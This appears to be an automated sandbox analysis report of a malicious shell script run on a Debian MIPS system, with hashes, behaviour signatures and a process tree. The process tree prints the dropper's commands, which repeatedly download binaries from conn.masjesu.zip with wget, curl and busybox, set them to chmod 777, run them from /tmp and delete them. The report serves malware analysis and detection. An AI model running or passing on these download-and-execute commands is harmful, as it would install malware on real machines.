Analysis
-
max time kernel
149s
-
max time network
148s
-
platform
debian-9_mipsel
-
resource
debian9-mipsel-20240611-en
-
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system
-
submitted
18/10/2024, 02:15
Static task
static1
Behavioral task
behavioral1
Sample
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh
-
Size
10KB
-
MD5
62c3af5d98480e4bfccd186de98627f5
-
SHA1
b814830f919dbd09114e657b1657554d719d9fb7
-
SHA256
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4
-
SHA512
32736f2421c49416705f2f773c0a659184e55a3fb4c329ad0a008b34fc43b59ec7d1100fac4fb4674776e5e02e46cf7729e29bb6491e99ba220e53df38489bf2
-
SSDEEP
192:G5B87XQQiZG/rqpxwZWOzkUZ/rqpxt5B87XSWkUzN:yQccZV9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 26 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 26 IoCs
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
-
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 27 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh/tmp/9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh1⤵PID:714
-
/bin/rm/bin/rm bins.sh2⤵PID:717
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- System Network Configuration Discovery
PID:721
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:758
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- System Network Configuration Discovery
PID:767
-
-
/bin/chmodchmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Executes dropped EXE
PID:779
-
-
/bin/rmrm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:781
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- System Network Configuration Discovery
PID:783
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- System Network Configuration Discovery
PID:797
-
-
/bin/chmodchmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- File and Directory Permissions Modification
PID:798
-
-
/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Executes dropped EXE
PID:799
-
-
/bin/rmrm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:800
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- System Network Configuration Discovery
PID:801
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- System Network Configuration Discovery
PID:834
-
-
/bin/chmodchmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:837
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- System Network Configuration Discovery
PID:838
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- System Network Configuration Discovery
PID:841
-
-
/bin/chmodchmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:844
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:845
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- System Network Configuration Discovery
PID:848
-
-
/bin/chmodchmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:851
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:852
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- System Network Configuration Discovery
PID:858
-
-
/bin/chmodchmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:861
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- System Network Configuration Discovery
PID:865
-
-
/bin/chmodchmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:868
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- System Network Configuration Discovery
PID:869
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- System Network Configuration Discovery
PID:872
-
-
/bin/chmodchmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- System Network Configuration Discovery
PID:879
-
-
/bin/chmodchmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:882
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- System Network Configuration Discovery
PID:883
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- System Network Configuration Discovery
PID:886
-
-
/bin/chmodchmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:889
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:890
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:893
-
-
/bin/chmodchmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:896
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- System Network Configuration Discovery
PID:897
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- System Network Configuration Discovery
PID:900
-
-
/bin/chmodchmod 777 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD./suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:903
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- System Network Configuration Discovery
PID:904
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- System Network Configuration Discovery
PID:907
-
-
/bin/chmodchmod 777 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA./3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:910
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- System Network Configuration Discovery
PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- System Network Configuration Discovery
PID:914
-
-
/bin/chmodchmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- System Network Configuration Discovery
PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- System Network Configuration Discovery
PID:921
-
-
/bin/chmodchmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:924
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- System Network Configuration Discovery
PID:925
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- System Network Configuration Discovery
PID:928
-
-
/bin/chmodchmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:931
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- System Network Configuration Discovery
PID:932
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- System Network Configuration Discovery
PID:935
-
-
/bin/chmodchmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:938
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:939
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- System Network Configuration Discovery
PID:942
-
-
/bin/chmodchmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:945
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:946
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- System Network Configuration Discovery
PID:949
-
-
/bin/chmodchmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:952
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- System Network Configuration Discovery
PID:953
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:956
-
-
/bin/chmodchmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:959
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- System Network Configuration Discovery
PID:963
-
-
/bin/chmodchmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:966
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- System Network Configuration Discovery
PID:967
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:973
-
-
/bin/chmodchmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:976
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- System Network Configuration Discovery
PID:977
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- System Network Configuration Discovery
PID:980
-
-
/bin/chmodchmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:983
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- System Network Configuration Discovery
PID:984
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:985
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- System Network Configuration Discovery
PID:987
-
-
/bin/chmodchmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:990
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- System Network Configuration Discovery
PID:991
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- System Network Configuration Discovery
PID:994
-
-
/bin/chmodchmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- File and Directory Permissions Modification
PID:995
-
-
/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Executes dropped EXE
PID:996
-
-
/bin/rmrm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:997
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:998
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:999
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:1001
-
-
/bin/chmodchmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- File and Directory Permissions Modification
PID:1002
-
-
/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Executes dropped EXE
PID:1003
-
-
/bin/rmrm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:1004
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- System Network Configuration Discovery
PID:1005
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1006
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- System Network Configuration Discovery
PID:1008
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97